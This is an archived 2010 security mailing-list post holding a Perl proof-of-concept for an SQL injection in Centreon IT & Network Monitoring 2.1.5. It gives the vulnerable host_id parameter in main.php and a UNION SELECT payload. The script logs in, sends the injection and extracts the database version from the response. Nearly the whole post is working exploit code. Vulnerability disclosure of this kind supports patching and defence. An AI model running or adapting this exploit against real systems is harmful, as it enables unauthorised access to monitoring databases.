|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Mehdi Mahdjoub - Sysdream IT Security Services (m.mahdjoub
sysdream.com)
Date: Fri Apr 02 2010 - 04:41:01 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#!/usr/bin/perl
# //--------[PoC]---------//
#
# Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author : Jonathan Salwan (j.salwansysdream.com)
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL
Injection]&o=p&min=1
#
# http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT
1,version,3,4,5&o=p&min=1
#
#
# //-------[Credit]-------//
#
# http://www.sysdream.com/article.php?story_id=328§ion_id=78
# http://www.shell-storm.org
#
use LWP::UserAgent;
my $url = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
my $sql = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION
SELECT 1,version,3,4,5&o=p&min=1';
my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');
my $req2 = $ua->post($url,
{useralias => $login, password => $paswd, submit =>
'login'},
Cookie => $cook,
Content-Type => 'application/x-www-form-urlencoded'
);
my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();
open(FILE, '>sql-centreon.txt');
print FILE $content;
close(FILE);
print "\n[Answer SQL Injection]\n\n";
my $selection = system('cat sql-centreon.txt | grep
">Host</td>"');
unlink('sql-centreon.txt');
print "\n";
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]